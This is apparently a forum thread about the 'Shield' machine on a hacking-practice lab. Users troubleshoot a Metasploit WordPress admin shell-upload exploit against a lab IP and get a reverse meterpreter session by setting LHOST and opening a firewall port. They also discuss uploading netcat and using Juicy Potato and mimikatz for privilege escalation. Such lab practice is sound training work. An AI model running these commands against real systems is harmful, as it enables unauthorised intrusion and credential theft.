Starting Point - Shield

Hi guys,
am stuck in a loop in the Sheild at the Starting point. am in between the last step of Wordpress where I can exploit Wordpress using ’ msfconsole 'and beginning point of Netcat, it doesn’t seem that I can upload nc.exe. If you’ve any advice here?
I’ve worked my way around msf by changing payloads types. but no meterpreter worked.
What else am missing.

You might have downloaded the wrong netcat file… I used version 1.11 and it worked
then just follow the walkthrough, it should work :smile:

-or-

Thanks for the replies guys. however, I think the issue is with msf. I can’t get meterpreter prompt following the same steps.
-------------Metasploit---------------
msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf > set PASSWORD P@s5w0rd!
msf > set USERNAME admin
msf > set TARGETURI /wordpress
msf > set RHOSTS 10.10.10.29
msf > run

When I hit run. It returns
-----------result-------
[] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[
] Preparing payload…
[] Uploading payload…
[
] Executing the payload at /wordpress/wp-content/plugins/nvCLEyQPUq/euQfJdmBzj.php…
[!] This exploit may require manual cleanup of ‘euQfJdmBzj.php’ on the target
[!] This exploit may require manual cleanup of ‘nvCLEyQPUq.php’ on the target
[!] This exploit may require manual cleanup of ‘…/nvCLEyQPUq’ on the target
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/wp_admin_shell_upload) >

so exploited completed, but no session so no meterpreter, is that normal at this point or I’ve got something wrong.

plus one more issue. the lcd command doesn’t work
msf > lcd /home/username/Downloads

check your firewall and username is not real username

Type your comment> @anggabvmv said:

check your firewall and username is not real username

Many thanks man, captured the flag :slight_smile:

Hi, I am new here and I do not know if I should open a new discussion or not, but this one is about exactly my problem.
Could you give me one more hint about the “Exploit completed, but no session was created.” situation? I could not divine what @anggabvmv said on April 7.

sysgh0st, Try ‘set LHOST 10.10.14.xx’ before ‘run’. Where xx is your IP

Thanks for the tip. I’ll try to explain how I solved in my case and hopefully, you’ll be able to spawn the meterpreter shell.

I started msfconsole as sudo, then, after typing in the exploit necessities, I added the above command from @astrocat .
When I ran the exploit, it still gave me the error, but that is when I realized that from the line “[*] Started reverse TCP handler on 10.10.14.xx (the htb ip):4444”, Metasploit was sending the signal back to port 4444, which I didn’t personally allow yet from the firewall (which was enabled).
I quickly added a rule to my firewall to allow from 10.10.10.29 proto tcp to any port 4444, and when I constructed the shell again, it worked!!!
So, when @anggabvmv meant by “check firewall”, I believe he meant us to create a door for the signal to come through. Hope this helps.

Type your comment> @Cyberali said:

Thanks for the replies guys. however, I think the issue is with msf. I can’t get meterpreter prompt following the same steps.
-------------Metasploit---------------
msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf > set PASSWORD P@s5w0rd!
msf > set USERNAME admin
msf > set TARGETURI /wordpress
msf > set RHOSTS 10.10.10.29
msf > run

When I hit run. It returns
-----------result-------
[] Authenticating with WordPress using admin:P@s5w0rd!..
[+] Authenticated with WordPress
[
] Preparing payload…
[] Uploading payload…
[
] Executing the payload at /wordpress/wp-content/plugins/nvCLEyQPUq/euQfJdmBzj.php…
[!] This exploit may require manual cleanup of ‘euQfJdmBzj.php’ on the target
[!] This exploit may require manual cleanup of ‘nvCLEyQPUq.php’ on the target
[!] This exploit may require manual cleanup of ‘…/nvCLEyQPUq’ on the target
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/wp_admin_shell_upload) >

so exploited completed, but no session so no meterpreter, is that normal at this point or I’ve got something wrong.

plus one more issue. the lcd command doesn’t work
msf > lcd /home/username/Downloads

I have same problem bro

Type your comment> @astrocat said:

sysgh0st, Try ‘set LHOST 10.10.14.xx’ before ‘run’. Where xx is your IP

This was key for running on HTB pwnbox (Parrot OS 4.11), $msfconsole --version
Framework Version: 6.0.38-dev

@sincera said:
Kali Linux / Packages / windows-binaries · GitLab
-or-
GitHub - interference-security/kali-windows-binaries: Windows binaries from Kali Linux : http://git.kali.org/gitweb/?p=packages/windows-binaries.git;a=summary

For HTB pwnbox (Parrot OS 4.11), there are two copies already on the system. They are different from each other.

$locate nc.exe
/opt/useful/SecLists/Web-Shells/FuzzDB/nc.exe
/usr/share/sqlninja/apps/nc.exe

$diff /opt/useful/SecLists/Web-Shells/FuzzDB/nc.exe /usr/share/sqlninja/apps/nc.exe
Binary files /opt/useful/SecLists/Web-Shells/FuzzDB/nc.exe and /usr/share/sqlninja/apps/nc.exe differ

is there a user flag on this box? I found the admin flag but not user flag… Thanks

Type your comment> @sincera said:

Kali Linux / Packages / windows-binaries · GitLab
-or-
GitHub - interference-security/kali-windows-binaries: Windows binaries from Kali Linux : http://git.kali.org/gitweb/?p=packages/windows-binaries.git;a=summary

@sincera I have tried both the links but I’m unable to upload nc(dot)exe ! What am I missing?

update:
After some research I have found that this link works. .I could successfully upload nc64(dot)exe .This is a netcat executable made especially for Window 64-bit operating systems.

Juicy Potato exe link:

mimikatz can be found within the path: /usr/share/windows-resources/mimikatz/x64.

update:
I could successfully finish shield machine! btw! :smiley: Even with walkthrough I found it tough because the tools keep on updating and some may not work and also there is always something new to learn . Nevertheless getting the result really is a sweet experience :blush: